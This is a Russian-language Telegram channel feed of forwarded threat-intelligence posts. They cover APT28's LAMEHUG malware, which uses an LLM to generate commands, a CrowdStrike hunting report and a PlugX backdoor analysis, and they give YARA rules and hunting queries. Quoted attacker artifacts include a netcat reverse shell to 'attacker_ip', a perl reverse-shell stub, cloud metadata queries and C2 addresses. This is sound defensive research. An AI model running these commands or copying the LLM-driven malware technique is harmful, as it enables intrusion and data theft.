Forwarded from Похек
[2/2] APT28 LAMEHUG: Первый AI-Powered Malware в дикой природе
4. Поведенческий анализ:
Защитные меры
Немедленные действия:
1. Блокировка известных IoC (IP, домены, хеши)
2. Мониторинг обращений к LLM API
3. Усиленный контроль email-вложений
4. Проверка директории %PROGRAMDATA%\info\
Долгосрочные меры:
Правила YARA для обнаружения:
Значение для индустрии
Новая эра угроз:
LAMEHUG представляет фундаментальный сдвиг в разработке malware. Использование LLM для динамической генерации команд делает malware более адаптивным и сложным для обнаружения.
Ключевые риски:
- Автоматизация сложных атак без экспертизы
- Обход статических сигнатур через динамическую генерацию
- Снижение барьера входа для киберпреступников
- Масштабирование персонализированных атак
Эволюция защиты:
Традиционные методы обнаружения, основанные на статических сигнатурах, становятся менее эффективными. Необходим переход к поведенческому анализу и мониторингу AI-активности.
Прогнозы развития
Ближайшее будущее:
- Интеграция более мощных LLM (GPT-4, Claude)
- Локальные LLM для избежания сетевых индикаторов
- AI-генерация полиморфного кода
- Автоматизированная социальная инженерия
Защитные технологии:
- AI-powered detection systems
- Behavioral analysis of AI usage
- LLM API monitoring and filtering
- Adversarial AI techniques
Практические рекомендации
Для SOC-команд:
1. Внедрить мониторинг LLM API трафика
2. Усилить анализ email-вложений с PyInstaller
3. Разработать playbook для AI-powered threats
Для организаций:
1. Обучение персонала новым типам угроз
2. Обновление политик использования AI
3. Контроль доступа к LLM API
4. Регулярный аудит AI-активности в сети
Выводы
LAMEHUG знаменует начало новой эры в кибербезопасности. APT28 продемонстрировала, как AI может быть weaponized для создания более изощренных и адаптивных угроз.
Критические моменты:
- Первый случай боевого применения LLM в malware
- Динамическая генерация команд через AI
- Снижение технических барьеров для атакующих
- Необходимость пересмотра подходов к защите
Индустрия должна готовиться к волне AI-powered угроз. Время адаптации защитных стратегий - сейчас.
✍️ Источник
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
4. Поведенческий анализ:
Необычные паттерны выполнения команд
Автоматизированная генерация системных команд
Массовый сбор системной информации
Защитные меры
Немедленные действия:
1. Блокировка известных IoC (IP, домены, хеши)
2. Мониторинг обращений к LLM API
3. Усиленный контроль email-вложений
4. Проверка директории %PROGRAMDATA%\info\
Долгосрочные меры:
# Блокировка LLM API (если не используются легитимно)
netsh advfirewall firewall add rule name="Block_LLM_APIs"
dir=out action=block remoteip=inference.huggingface.co
# Мониторинг подозрительных процессов
wevtutil qe Security /q:"*[System[EventID=4688] and
EventData[Data[@Name='NewProcessName'] and
(contains(.,'wmic') or contains(.,'systeminfo'))]]"
Правила YARA для обнаружения:
rule LAMEHUG_AI_Malware {
meta:
description = "Detects LAMEHUG AI-powered malware"
author = "Security Research"
date = "2025-07-30"
strings:
$api1 = "inference.huggingface.co"
$api2 = "Qwen2.5-Coder"
$path = "%PROGRAMDATA%\\info\\info.txt"
$cmd1 = "systeminfo >>"
$cmd2 = "wmic computersystem"
condition:
2 of them
}Значение для индустрии
Новая эра угроз:
LAMEHUG представляет фундаментальный сдвиг в разработке malware. Использование LLM для динамической генерации команд делает malware более адаптивным и сложным для обнаружения.
Ключевые риски:
- Автоматизация сложных атак без экспертизы
- Обход статических сигнатур через динамическую генерацию
- Снижение барьера входа для киберпреступников
- Масштабирование персонализированных атак
Эволюция защиты:
Традиционные методы обнаружения, основанные на статических сигнатурах, становятся менее эффективными. Необходим переход к поведенческому анализу и мониторингу AI-активности.
Прогнозы развития
Ближайшее будущее:
- Интеграция более мощных LLM (GPT-4, Claude)
- Локальные LLM для избежания сетевых индикаторов
- AI-генерация полиморфного кода
- Автоматизированная социальная инженерия
Защитные технологии:
- AI-powered detection systems
- Behavioral analysis of AI usage
- LLM API monitoring and filtering
- Adversarial AI techniques
Практические рекомендации
Для SOC-команд:
1. Внедрить мониторинг LLM API трафика
2. Усилить анализ email-вложений с PyInstaller
3. Разработать playbook для AI-powered threats
Для организаций:
1. Обучение персонала новым типам угроз
2. Обновление политик использования AI
3. Контроль доступа к LLM API
4. Регулярный аудит AI-активности в сети
Выводы
LAMEHUG знаменует начало новой эры в кибербезопасности. APT28 продемонстрировала, как AI может быть weaponized для создания более изощренных и адаптивных угроз.
Критические моменты:
- Первый случай боевого применения LLM в malware
- Динамическая генерация команд через AI
- Снижение технических барьеров для атакующих
- Необходимость пересмотра подходов к защите
Индустрия должна готовиться к волне AI-powered угроз. Время адаптации защитных стратегий - сейчас.
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Пакет StarDict в Debian отправляет выделенный текст на внешние серверы
В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена проблема с конфиденциальностью - в конфигурации по умолчанию приложение отправляет автоматически помещаемый в буфер…
🔗Ссылка:
https://opennet.ru/63677/
https://opennet.ru/63677/
www.opennet.ru
Выпуск Proxmox VE 9.0, дистрибутива для организации работы виртуальных серверов
Опубликован релиз Proxmox Virtual Environment 9.0, специализированного Linux-дистрибутива на базе Debian GNU/Linux, нацеленного на развертывание и обслуживание виртуальных серверов с использованием LXC и KVM, и способного выступить в роли замены таких продуктов…
🔗Ссылка:
https://opennet.ru/63688/
https://opennet.ru/63688/
Forwarded from Threat Hunting Father 🦔
Crowdstrike_Threat_Hunting_Report.pdf
9.3 MB
Что подметить из репорта:
🔀 Cross-Domain / Cloud: когда атакуют сразу всё
🕷️ BLOCKADE SPIDER:
• Начал с уязвимого VPN → DCSync → lateral через WinRM / PsExec
• Переходил с endpoint на cloud: bypass MFA, создание rogue IAM agent
• Пробивал Entra ID: добавление в “IAM No MFA”, обход геофильтров
• На unmanaged системах ставил Chisel proxy и устраивал SOCKS-туннели
📌 Зафиксированы попытки помешать Falcon Sensor
• Эксплуатация Cisco IOS/IOS XE (CVE-2023-20198 + CVE-2023-20273)
• Создание локального пользователя → log sanitization → RCE
• Удар по blind-spot: роутеры, VPN, свитчи, вне зоны действия EDR
• Pivot из Jenkins в облако через IMDS → добавление SSH-ключей и access key
• Использование CSP CLI и команд:
curl http://IP/latest/meta-data/
aws s3 ls
gcloud compute ssh ...
• Жил в control plane, хостил payload на облачных инстансах• Использовал .NET тул для возвращения в консоль по backdoor key
• Атака через trusted relationship → backdoor в Entra ID сервисные учётки
• Компрометация стороннего Azure-провайдера → логины с NAS/VPS
• Отмечена малварь CloudedHope, удаление логов и резкая OPSEC-дисциплина
• MFA reset → SSO логин → SharePoint → PAM → dump ntds.dit
• Отслежено, как они:
меняют IP на резидентские (NSOCKS)
ищут "reset password" шаблоны
работают ночью, чтобы не быть замеченными
SaaS + Identity + Endpoint = полный доступ без вирусов.
🔍 Поиск по:
DeviceLogonEvents
| where AccountName endswith "@domain.com"
| where Timestamp during non-business-hours
| where LogonType == "RemoteInteractive"
• Угроза телеком-сектора на Linux, скрытая и долгая
• Эксплуатация CVE-2016-5195 (Dirty COW) + CVE-2021-4034 (PwnKit)
• ShieldSlide: троянизированный OpenSSH (
/usr/sbin/sshd) с логами auth + backdoor-пароль• Примеры артефактов:
/usr/sbin/cron → изменённый daemonperl -e 'use Socket; ...' → reverse shellnetcat -e /bin/bash attacker_ip• LOTL-движение, атаки между дочками компаний
sha256sum /usr/sbin/sshd | grep -v known_good
ps aux | grep cron | grep -v /usr/sbin/cron
• Zero-Day в Cleo MFT (
CVE-2024-55956) → bypass старого фикса CVE-2024-50623• Этапы:
Загрузка
.zip → C:\VLTrader\temp\В распаковке XML с параметром выполнения команды
Внедрение shellcode → запуск пиратского Cobalt Strike
• Использовал:
<Mailbox type="system" command="powershell -enc ..." />
Falcon Sensor + OverWatch охота по:#event_simpleName=PeFileWritten
ContextBaseFileName=java.exe
TargetFileName!=/<known_good_files>/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Social Engineering
• Недавно в блоге Operation Zero (компания которая покупает уязвимости в различном ПО\устройствах) была опубликована хорошая статья, которая описывает архитектуру современных браузеров и их эксплуатации на примере Chrome.
• Вы сможете изучить, как устроены подсистемы браузера, как обеспечивается их безопасность и как она нарушается с помощью уязвимостей, примитивов, обходов защит, эксплоитов и их цепочек. Каждая статья будет практической, поэтому с самого начала авторы кратко анализируют несколько известных эксплоитов, компилируют их благодаря публичному репозиторию и пробивают Chrome 130-й версии для Windows.
• Учитывайте, что на данный момент опубликована только первая часть на английском языке. Позже будет опубликовано продолжение, так что следите за блогом. Ну и еще обещают перевод на русский язык, но это не точно.
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Доступен дистрибутив Proxmox Backup Server 4.0
Компания Proxmox, известная разработкой продуктов Proxmox Virtual Environment и Proxmox Mail Gateway, опубликовала выпуск дистрибутива Proxmox Backup Server 4.0, который преподносится как готовое решение для резервного копирования и восстановления виртуальных…
🔗Ссылка:
https://opennet.ru/63693/
https://opennet.ru/63693/
Forwarded from ESCalator
Operation Tartaria Part 2
Помимо пассивного бэкдора
🫣 Как и в предыдущем случае, мы имеем дело с двухмодульным бэкдором. Коннектор внедряется в процесс
При успешном старте исследуемый образец подключается к блогу на
Помимо Yandex Cloud, бэкдор поддерживает возможность общения через Microsoft Graph и Dropbox:
Общение происходит посредством чтения и перезаписи файлов в заданной папке в облаке. Сами файлы защищены шифром простой замены, а структура сообщений отличается в зависимости от выполняемой команды. Однако везде используется один и тот же
☝️ Примечательны следующие функции бэкдора:
• возможность получать шеллкоды и PE-файлы, внедряя их в процессы
• выполнение WMI-запросов для получения информации о системе:
• отключение всех сетевых соединений API WNetCancelConnection2W;
• изменение параметров входа в учетную запись или пароля через API NetUserSetInfo.
C2:
✅ Рекомендации:
• запрет DevTunnels с помощью групповой политики;
• поиск скрытых задач;
• поиск задач с параметром:
• поиск идентификатора
Happy hunting!
@ptescalator
#dfir #ti #apt #reverse #malware
Помимо пассивного бэкдора
PlugX, нам удалось обнаружить еще одну его версию, которая мимикрировала под запуск Яндекс Браузера.{"TaskId":"[REDACTED]","TaskName":"Yandexstart_Server","TaskRegistryPath":"\\Yandexstart_Server","TaskAuthor":"[REDACTED]","IsHiddenTask":false,"IsMissingOnFS":true,"Action":{"Context":"Author","Properties":[{"Id":"","ActionName":"Execution","Arguments":"-d restart","Command":"C:\\PROGRA~1\\Yandex\\browser\\Yandex.exe","WorkingDirectory":"","Flags":0}],"Version":3},"Triggers":[{"TriggerType":"Boot","Comment":"Boot"}],"CreatedTime":"2024-12-11T01:11:34Z","LastRunTime":"2025-06-23T06:37:17Z","LastErrorCode":1223,"Timeline":"2024-12-11T01:11:34Z"}
Yandex.exe оказался уязвимым для техники DLL Side-Loading, выполняемой утилитой Umdh.exe (User-Mode Dump Heap), которая подгружает вредоносную библиотеку dbghelp.dll под пакером VMProtect с кастомным названием секций; нагрузка хранится в файле desktop.ini.🫣 Как и в предыдущем случае, мы имеем дело с двухмодульным бэкдором. Коннектор внедряется в процесс
choice.exe, а интерпретатор команд — в mspaint.exe. Процессы общаются через pipe .\\PIPE\\[%d].При успешном старте исследуемый образец подключается к блогу на
livejournal.com (скриншот 1) и на ok.ru (скриншоты 2-3). Далее парсит содержимое ответа и ищет последовательность, которая начинается с R241223 и заканчивается на R251223 и внутри которой находится зашифрованный токен для API Yandex Cloud. Далее коммуникация бэкдора происходит через API. Аналогичный образец был описан в «CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации».Помимо Yandex Cloud, бэкдор поддерживает возможность общения через Microsoft Graph и Dropbox:
cloud-api.yandex.net
graph.microsoft.com
content.dropboxapi.com
Общение происходит посредством чтения и перезаписи файлов в заданной папке в облаке. Сами файлы защищены шифром простой замены, а структура сообщений отличается в зависимости от выполняемой команды. Однако везде используется один и тот же
header:0 2 6 10 14
| command | msg size | short answer | ticketcount |
☝️ Примечательны следующие функции бэкдора:
• возможность получать шеллкоды и PE-файлы, внедряя их в процессы
TSTheme.exe и msiexec.exe;• выполнение WMI-запросов для получения информации о системе:
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_TimeZone
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_QuickFixEngineering
• отключение всех сетевых соединений API WNetCancelConnection2W;
• изменение параметров входа в учетную запись или пароля через API NetUserSetInfo.
C2:
devtunnels.ms
https://anddes.livejournal.com/511.html
https://ok.ru/profile/587950172233/statuses/157023463517001
✅ Рекомендации:
• запрет DevTunnels с помощью групповой политики;
• поиск скрытых задач;
• поиск задач с параметром:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2D00720065006D006F0074006500200075007000"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2d00640020007200650073007400610072007400"
• поиск идентификатора
PlugX:reg query HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\cf
Happy hunting!
@ptescalator
#dfir #ti #apt #reverse #malware